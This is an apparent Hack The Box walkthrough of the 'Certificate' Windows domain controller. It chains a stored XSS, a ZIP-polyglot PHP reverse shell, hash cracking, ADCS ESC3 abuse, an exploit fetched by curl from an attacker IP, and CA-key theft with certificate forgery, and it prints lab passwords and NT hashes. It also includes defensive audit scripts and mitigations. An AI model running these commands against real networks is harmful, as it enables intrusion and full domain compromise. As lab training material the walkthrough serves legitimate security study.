
HackTheBox - Certificate Walkthrough

Machine Information

  • Name: Certificate
  • Difficulty: Hard
  • OS: Windows / Active Directory
  • IP: 10.10.11.71
  • Domain: certificate.htb

Synopsis

Certificate is a hard-difficulty Windows Active Directory machine that chains multiple advanced exploitation techniques. The attack path involves exploiting XSS in a web application, bypassing file upload restrictions using ZIP polyglots, extracting Kerberos pre-authentication hashes from PCAP files, abusing ADCS ESC3 certificate templates, and escalating privileges through SeManageVolumePrivilege to forge CA certificates for domain administrator access.


Reconnaissance

Nmap Scan

# Full TCP sweep first, then a service/script scan restricted to the open ports
export TARGET=10.10.11.71
nmap -sCVT -v -A -p"$(nmap -v -T5 -Pn -p- "$TARGET" | grep -E '^[0-9]+/tcp' | awk -F'/' '{print $1}' | paste -sd ',')" "$TARGET" -oN certificate_nmap

Open Ports:

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Key findings:

  • Active Directory Domain Controller
  • Web server running Apache with PHP
  • WinRM enabled (port 5985)
  • Domain: certificate.htb
  • DC: DC01.certificate.htb

Phase 1: Web Application Exploitation

Technology Fingerprinting

whatweb http://certificate.htb

Stack:

  • Apache 2.4.58 (Win64)
  • PHP 8.0.30
  • Bootstrap, jQuery
  • OpenSSL 3.1.3

Directory Enumeration

gobuster dir -u http://certificate.htb/ \
  -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt \
  -t 100 -x php

Discovered endpoints:

/DB.php           - Empty response (database connection file)
/Index.php        - Main page
/Login.php        - Authentication
/register.php     - User registration
/upload.php       - Redirects to login (requires authentication)
/courses.php      - Requires authentication
/logout.php       - Session termination
/static/          - Static resources

XSS Discovery

Registered user with username: <script>alert("1")</script>

Result: the payload executes on the login page, confirming a stored XSS vulnerability.

Upload Endpoint Analysis

Accessing /upload.php returns:

404 Not Found
No quizz found with the given SID.

Parameter fuzzing reveals the endpoint expects s_id (session/quiz ID):

gobuster fuzz -u "http://certificate.htb/upload.php?s_id=FUZZ" \
  -w 1-100.txt \
  -t 100 \
  -H "Cookie: PHPSESSID=ue6384fivhcr4ddv35gism94mf" | grep "Status=200"

Multiple quiz IDs (1-100) return status 200, providing file upload functionality.


Phase 2: File Upload Bypass & Initial Access

Upload Restriction Analysis

Direct PHP upload is blocked. The application validates file types and content.

ZIP Polyglot Attack

Create a valid ZIP containing benign content, then append a malicious ZIP:

Step 1: Create legitimate file

echo "hi blackarch" > blackarch.pdf
zip blackarch.zip blackarch.pdf

Step 2: Create reverse shell

cat > shell.php << 'EOF'
<?php
shell_exec("powershell -e <base64-encoded payload omitted>");
?>
EOF

Step 3: Create polyglot

# Place shell.php in my_files directory
mkdir my_files
mv shell.php my_files/
zip -r my_files.zip my_files/

# Concatenate ZIPs to create polyglot
cat blackarch.zip my_files.zip > polyglot.zip

Step 4: Upload and trigger

# Start listener
rlwrap nc -lvnp 1234

# Upload polyglot.zip to any quiz (s_id=1-100)
# Access shell at:
# http://certificate.htb/static/uploads/<hash>/my_files/shell.php

Shell obtained as: xamppuser
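
Added example, not part of the original walkthrough: a server-side check that catches the concatenated-archive trick used above (the "validate file content, not just extension" mitigation). It assumes the upload handler can see the raw bytes and that ALLOWED_EXT is the set of member types a quiz upload should contain; the sample archives are constructed in memory.

```python
import io
import posixpath
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"   # end-of-central-directory record signature
ALLOWED_EXT = {".pdf", ".txt", ".png", ".jpg"}   # assumption: what a quiz upload may contain

def build_zip(entries):
    """In-memory, stored (uncompressed) ZIP from {name: bytes}; used for the samples only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

def _archive_end(blob, eocd_pos):
    """Offset just past the 22-byte EOCD record at eocd_pos plus its declared comment."""
    return eocd_pos + 22 + struct.unpack("<H", blob[eocd_pos + 20:eocd_pos + 22])[0]

def _members(blob, eocd_pos):
    """Member names of the archive that ends at the EOCD record at eocd_pos."""
    with zipfile.ZipFile(io.BytesIO(blob[:_archive_end(blob, eocd_pos)])) as zf:
        return zf.namelist()

def audit_zip(blob):
    """Return reasons to reject the upload; an empty list means the archive passed."""
    eocds = [i for i in range(len(blob)) if blob.startswith(EOCD_SIG, i)]
    if not eocds:
        return ["no end-of-central-directory record"]
    reasons = []
    if len(eocds) > 1:
        reasons.append(f"{len(eocds)} end-of-central-directory records (expected 1)")
    # A validator reading the first archive and an extractor reading the last disagree here.
    first, last = _members(blob, eocds[0]), _members(blob, eocds[-1])
    if first != last:
        reasons.append(f"first archive {first} differs from last archive {last}")
    if _archive_end(blob, eocds[-1]) != len(blob):
        reasons.append("trailing bytes after the final EOCD record")
    for name in last:   # allowlist applied to what would actually be extracted
        ext = posixpath.splitext(name)[1].lower()
        if not name.endswith("/") and ext not in ALLOWED_EXT:
            reasons.append(f"member {name!r} has disallowed extension {ext!r}")
    return reasons

# Constructed samples: a benign archive, then one carrying a PHP file, joined like `cat a.zip b.zip`.
BENIGN = build_zip({"blackarch.pdf": b"hi blackarch\n"})
MALICIOUS = build_zip({"my_files/shell.php": b"<?php /* placeholder, no payload */ ?>"})
POLYGLOT = BENIGN + MALICIOUS
```

Python's own zipfile module reads the last EOCD record, so the polyglot opens as the appended archive; that is why the check compares both ends rather than trusting one parse.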


Phase 3: Database Enumeration & Credential Extraction

Database Credentials

Reading /xampp/htdocs/certificate.htb/db.php:

$dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
$db_user = 'certificate_webapp_user';
$db_passwd = 'cert!f!c@teDBPWD';

User Enumeration

C:\xampp\mysql\bin\mysql.exe -u 'certificate_webapp_user' \
  -p'cert!f!c@teDBPWD' \
  -e 'use certificate_webapp_db; select * from users;'

Key users identified:

ID  Name           Username   Email                        Role     Hash
1   Lorra Armessa  Lorra.AAA  lorra.aaa@certificate.htb    teacher  $2y$04$bZs2FUjVRiFswY84CUR8ve…
10  Sara Brawn     sara.b     sara.b@certificate.htb       admin    $2y$04$CgDe/Thzw/Em/M4SkmXNbu…

Password Cracking

hashcat -m 3200 -a 0 hash.txt \
  /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-1000000.txt

Cracked:

  • sara.b@certificate.htb : Blink182

Hash type: bcrypt ($2y$) with cost factor 4 (very weak)
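
Added example, not from the walkthrough: an audit over the users table that parses the bcrypt modular-crypt string, flags any cost below the policy floor and reports how much cheaper each guess becomes, and catches reused salts. Only the $2y$04$ prefix and the 22-character salts come from the table above; the digests and the third row are constructed.

```python
import re

# Modular crypt format written by PHP's password_hash(PASSWORD_BCRYPT):
#   $2y$<2-digit cost>$<22-char salt><31-char digest>, all in bcrypt's ./A-Za-z0-9 alphabet.
BCRYPT_RE = re.compile(r"^\$2[aby]\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")
MIN_COST = 12   # policy floor, matching the mitigation in this writeup

def parse_bcrypt(value):
    """Split a bcrypt string into cost, salt and digest; raise on anything incomplete."""
    m = BCRYPT_RE.match(value)
    if not m:
        raise ValueError("not a complete bcrypt hash")
    return {"cost": int(m.group(1)), "salt": m.group(2), "digest": m.group(3)}

def audit_hashes(rows, min_cost=MIN_COST):
    """rows: iterable of (username, hash). Returns one finding string per problem."""
    findings, seen_salts = [], {}
    for user, value in rows:
        try:
            parsed = parse_bcrypt(value)
        except ValueError as exc:
            findings.append(f"{user}: {exc}")
            continue
        if parsed["cost"] < min_cost:
            speedup = 2 ** (min_cost - parsed["cost"])   # bcrypt work doubles per cost step
            findings.append(f"{user}: cost {parsed['cost']} below {min_cost}; "
                            f"cracking is {speedup}x cheaper than policy allows")
        if parsed["salt"] in seen_salts:
            findings.append(f"{user}: salt reused from {seen_salts[parsed['salt']]}")
        seen_salts.setdefault(parsed["salt"], user)
    return findings

# Constructed rows: the page shows only truncated hashes, so the digests are made up and
# the third row deliberately reuses sara.b's salt; the $2y$04$ costs are what was found.
SAMPLE_ROWS = [
    ("sara.b",    "$2y$04$" + "CgDe/Thzw/Em/M4SkmXNbu" + "A" * 31),
    ("lorra.aaa", "$2y$04$" + "bZs2FUjVRiFswY84CUR8ve" + "B" * 31),
    ("qa.user",   "$2y$12$" + "CgDe/Thzw/Em/M4SkmXNbu" + "C" * 31),
]
```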


Phase 4: Active Directory Enumeration

Initial WinRM Access

evil-winrm -i 10.10.11.71 -u Sara.B -p 'Blink182'

BloodHound Collection

bloodhound-python -dc DC01.certificate.htb \
  -u 'Sara.B' -p 'Blink182' \
  -d certificate.htb \
  -c All \
  -ns 10.10.11.71

Note: Clock skew warning indicates time synchronization issue with DC.

Findings:

  • No immediate privilege escalation paths
  • Sara.B has standard user privileges
  • Need to find additional attack vectors

PCAP File Discovery

Found network capture: WS-01_PktMon.pcap


Phase 5: Kerberos Pre-Authentication Attack

PCAP Analysis with NetworkMiner

Opening the PCAP in NetworkMiner reveals Kerberos traffic for user Lion.SK.

Hash Extraction

# Convert PCAP to PDML format
tshark -r WS-01_PktMon.pcap -T pdml > sample.pdml

# Extract Kerberos hash
krb2john sample.pdml

Extracted hash:

Lion.SK:$krb5pa$18$Lion.SK$CERTIFICATE$$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

Hash type: Kerberos 5 etype 18 Pre-Authentication

Hash Cracking

hashcat -m 19900 -a 0 hash3.txt /usr/share/wordlists/rockyou.txt

Cracked: !QAZ2wsx

Credentials:

  • User: Lion.SK
  • Password: !QAZ2wsx

User Flag

evil-winrm -i 10.10.11.71 -u Lion.SK -p '!QAZ2wsx'
type C:\Users\Lion.SK\Desktop\user.txt

Phase 6: ADCS ESC3 Certificate Template Abuse

Certificate Template Enumeration

certipy find -u 'Lion.SK' -p '!QAZ2wsx' \
  -dc-ip 10.10.11.71 \
  -vulnerable \
  -stdout

Vulnerable template discovered:

Template Name: Delegated-CRA
Certificate Authorities: Certificate-LTD-CA
Enabled: True
Enrollment Agent: True
Extended Key Usage: Certificate Request Agent
Enrollment Rights: CERTIFICATE.HTB\Domain CRA Managers
Vulnerabilities: ESC3 - Template has Certificate Request Agent EKU set

Key findings:

  • Lion.SK is member of Domain CRA Managers
  • Template allows requesting certificates on behalf of other users
  • ESC3 vulnerability enables privilege escalation
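
Added example, not from the walkthrough or from certipy: the ESC3 conditions above expressed as an audit rule over template attributes, so a defender can see which single change (manager approval, a required agent signature, or narrowed enrollment rights) takes a template off the list. The EKU OID and enrollment-flag bit are the documented Windows PKI values; the sample template mirrors the certipy output above, with the enrollment-flag and RA-signature values assumed.

```python
# Well-known Windows PKI constants (not taken from the walkthrough).
EKU_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"   # "Certificate Request Agent" EKU OID
CT_FLAG_PEND_ALL_REQUESTS = 0x2                      # msPKI-Enrollment-Flag: manager approval

# Assumption: principals that may legitimately enroll in an enrollment-agent template.
TRUSTED_ENROLLERS = {"Domain Admins", "Enterprise Admins"}

def _short(principal):
    """'CERTIFICATE.HTB\\Domain CRA Managers' -> 'Domain CRA Managers'."""
    return principal.split("\\")[-1]

def esc3_findings(template, trusted=TRUSTED_ENROLLERS):
    """Check one template (dict of LDAP-style attributes) for the ESC3 pattern; returns
    the conditions that together make it abusable, or [] when any one of them is absent."""
    if not template.get("enabled"):
        return []
    if EKU_CERT_REQUEST_AGENT not in template.get("pKIExtendedKeyUsage", ()):
        return []
    if template.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS:
        return []   # a certificate manager must approve every request
    if template.get("msPKI-RA-Signature", 0) > 0:
        return []   # requests must already carry an authorized signature
    untrusted = sorted(p for p in template.get("enrollment_rights", ()) if _short(p) not in trusted)
    if not untrusted:
        return []
    return [
        f"{template['name']}: enabled template carries the Certificate Request Agent EKU",
        "no manager approval (CT_FLAG_PEND_ALL_REQUESTS clear)",
        "no authorized signatures required (msPKI-RA-Signature = 0)",
        "enrollable by: " + ", ".join(untrusted),
    ]

def audit_templates(templates):
    flagged = {}   # template name -> findings, flagged templates only
    for template in templates:
        findings = esc3_findings(template)
        if findings:
            flagged[template["name"]] = findings
    return flagged

# Constructed sample mirroring the certipy output above. The enrollment-flag and
# RA-signature values are assumed; they are the ones a flagged template must have.
DELEGATED_CRA = {
    "name": "Delegated-CRA", "enabled": True,
    "pKIExtendedKeyUsage": [EKU_CERT_REQUEST_AGENT],
    "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
    "enrollment_rights": ["CERTIFICATE.HTB\\Domain CRA Managers"],
}
# The same template after the mitigation "implement manager approval".
HARDENED_CRA = {**DELEGATED_CRA, "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS}
```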

ESC3 Attack Chain

Reference: HackingArticles - ADCS ESC3

Step 1: Request Enrollment Agent Certificate

certipy req -u 'Lion.SK' -p '!QAZ2wsx' \
  -dc-ip 10.10.11.71 \
  -ca Certificate-LTD-CA \
  -target 'DC01.certificate.htb' \
  -template 'Delegated-CRA'

Output: lion.sk.pfx (enrollment agent certificate)

Step 2: Request Certificate On-Behalf-Of Ryan.K

certipy req -u 'lion.sk@CERTIFICATE.HTB' \
  -p '!QAZ2wsx' \
  -dc-ip '10.10.11.71' \
  -target 'DC01.CERTIFICATE.HTB' \
  -ca 'Certificate-LTD-CA' \
  -template 'SignedUser' \
  -pfx 'lion.sk.pfx' \
  -on-behalf-of 'CERTIFICATE\ryan.k'

Output: ryan.k.pfx

Step 3: Extract NT Hash

certipy auth -pfx ryan.k.pfx -dc-ip 10.10.11.71

Ryan.K credentials:

Username: ryan.k@certificate.htb
NT Hash: b1bc3d70e70f4f36b1509a65ae1a2ae6

Lateral Movement

evil-winrm -i 10.10.11.71 -u Ryan.K -H b1bc3d70e70f4f36b1509a65ae1a2ae6

Phase 7: Privilege Escalation to Administrator

Privilege Analysis

whoami /priv

Key privilege identified:

SeManageVolumePrivilege    Perform volume maintenance tasks    Enabled

SeManageVolumePrivilege Exploitation

Vulnerability: This privilege allows performing volume-level operations that can be abused to gain arbitrary write access to system directories.

Reference: Medium - Active Directory Pentesting

Exploit: SeManageVolumeExploit GitHub

Step 1: Upload Exploit

curl http://10.10.14.197/SeManageVolumeExploit.exe -o SeManageVolumeExploit.exe

Step 2: Execute Exploit

.\SeManageVolumeExploit.exe

Result:

Entries changed: 853
DONE

Step 3: Verify Write Access

echo "certificate box" > C:\Windows\htb.txt
type C:\Windows\htb.txt

Success! We now have write access to C:\Windows\.

Certificate Authority Private Key Export

With write access to C:\Windows\, we can export the CA certificate and private key:

mkdir C:\temp
cd C:\temp

certutil -exportPFX my "Certificate-LTD-CA" C:\temp\ca.pfx

Interactive prompts:

  • Enter password: (leave blank or set password)
  • Confirm password

Download certificate:

download ca.pfx

Administrator Certificate Forgery

Step 1: Forge Administrator Certificate

certipy forge -ca-pfx ca.pfx \
  -upn 'administrator@certificate.htb' \
  -out forged_admin.pfx

Step 2: Extract Administrator Hash

certipy auth -dc-ip '10.10.11.71' \
  -pfx 'forged_admin.pfx' \
  -username 'administrator' \
  -domain 'certificate.htb'

Administrator credentials:

Username: administrator@certificate.htb
NT Hash: d804304519bf0143c14cbf1c024408c6

Root Flag

evil-winrm -i 10.10.11.71 -u Administrator -H d804304519bf0143c14cbf1c024408c6

type C:\Users\Administrator\Desktop\root.txt

Attack Chain Summary

┌─────────────────────────────────────────────────────────────────┐
│                    ATTACK PROGRESSION                           │
└─────────────────────────────────────────────────────────────────┘

Web Enumeration → XSS Discovery → File Upload (s_id parameter)
        ↓
ZIP Polyglot Bypass → PHP Shell Upload → xamppuser Access
        ↓
Database Enumeration → Password Hashes → Sara.B (Blink182)
        ↓
PCAP Analysis → Kerberos Pre-Auth Hash → Lion.SK (!QAZ2wsx)
        ↓
ADCS Template Enum → ESC3 Vulnerability → Enrollment Agent Cert
        ↓
On-Behalf-Of Request → Ryan.K Certificate → Ryan.K Hash
        ↓
SeManageVolumePrivilege → C:\Windows Write Access
        ↓
CA Certificate Export → Certificate Forgery → Administrator Hash
        ↓
Domain Administrator Access → Root Flag

Key Vulnerabilities & Mitigations

1. Stored XSS in Web Application

Vulnerability: No input sanitization on user registration

Impact: Session hijacking, cookie theft

Mitigation:

  • Implement Content Security Policy (CSP)
  • HTML encode all user-supplied input
  • Use HTTPOnly and Secure flags on cookies

2. File Upload Bypass via ZIP Polyglot

Vulnerability: Insufficient file validation

Impact: Remote code execution

Mitigation:

  • Validate file content, not just extension
  • Use anti-malware scanning
  • Execute uploads in sandboxed environment
  • Implement strict MIME type checking

3. Weak Password Hashing

Vulnerability: Bcrypt with cost factor 4

Impact: Rapid password cracking

Mitigation:

  • Increase bcrypt cost to minimum 12
  • Implement rate limiting on login
  • Use unique salts per password

4. Hardcoded Database Credentials

Vulnerability: Credentials in db.php

Impact: Full database access

Mitigation:

  • Use environment variables
  • Implement least-privilege database access
  • Rotate credentials regularly

5. Exposed Network Captures

Vulnerability: PCAP file with Kerberos pre-auth

Impact: Offline password cracking

Mitigation:

  • Secure network captures with proper ACLs
  • Use strong Kerberos pre-authentication passwords
  • Implement Kerberos armoring (FAST)

6. ADCS ESC3 Misconfiguration

Vulnerability: Certificate Request Agent template accessible

Impact: Impersonation of any domain user

Mitigation:

  • Restrict enrollment agent templates
  • Implement manager approval
  • Audit certificate template permissions
  • Remove unnecessary EKUs

7. SeManageVolumePrivilege Abuse

Vulnerability: Excessive privilege assignment

Impact: System directory write access

Mitigation:

  • Follow principle of least privilege
  • Restrict SeManageVolumePrivilege to administrators only
  • Monitor privilege usage with logging

8. CA Private Key Exportable

Vulnerability: CA certificate private key can be exported

Impact: Complete domain compromise via certificate forgery

Mitigation:

  • Use Hardware Security Module (HSM) for CA keys
  • Mark CA private keys as non-exportable
  • Implement strong physical and logical security
  • Enable CA auditing and monitoring

Tools Used

  • nmapautomator - Automated port scanning
  • gobuster - Directory and parameter fuzzing
  • evil-winrm - Windows Remote Management client
  • hashcat - Password hash cracking
  • certipy-ad - ADCS abuse and certificate operations
  • bloodhound-python - Active Directory enumeration
  • tshark/krb2john - Kerberos hash extraction from PCAP
  • NetworkMiner - Network traffic analysis

Timeline

  1. Web Enumeration - Discovered upload endpoint with parameter fuzzing
  2. XSS Discovery - Stored XSS in registration form
  3. File Upload Bypass - ZIP polyglot technique for PHP shell
  4. Database Access - Extracted credentials from db.php
  5. Password Cracking - Obtained Sara.B access
  6. PCAP Analysis - Extracted Lion.SK Kerberos hash
  7. User Flag - Accessed as Lion.SK
  8. ADCS ESC3 - Abused certificate template for lateral movement
  9. Privilege Enumeration - Identified SeManageVolumePrivilege
  10. CA Certificate Theft - Exported CA private key
  11. Certificate Forgery - Generated Administrator certificate
  12. Root Flag - Achieved Domain Admin access

Lessons Learned

  1. Defense in Depth - Multiple vulnerabilities were chained; a single fix would have prevented the attack
  2. ADCS Security - Certificate templates require careful configuration
  3. Privilege Management - Excessive Windows privileges enable powerful attacks
  4. Network Monitoring - PCAP files should be treated as sensitive data
  5. Input Validation - All user input must be validated, including file uploads
  6. Credential Hygiene - Strong passwords and secure storage are critical

Disclaimer: This writeup is for educational purposes only. Perform penetration testing only on systems you own or have explicit permission to test.

Date: October 2025

This post is licensed under CC BY 4.0 by the author.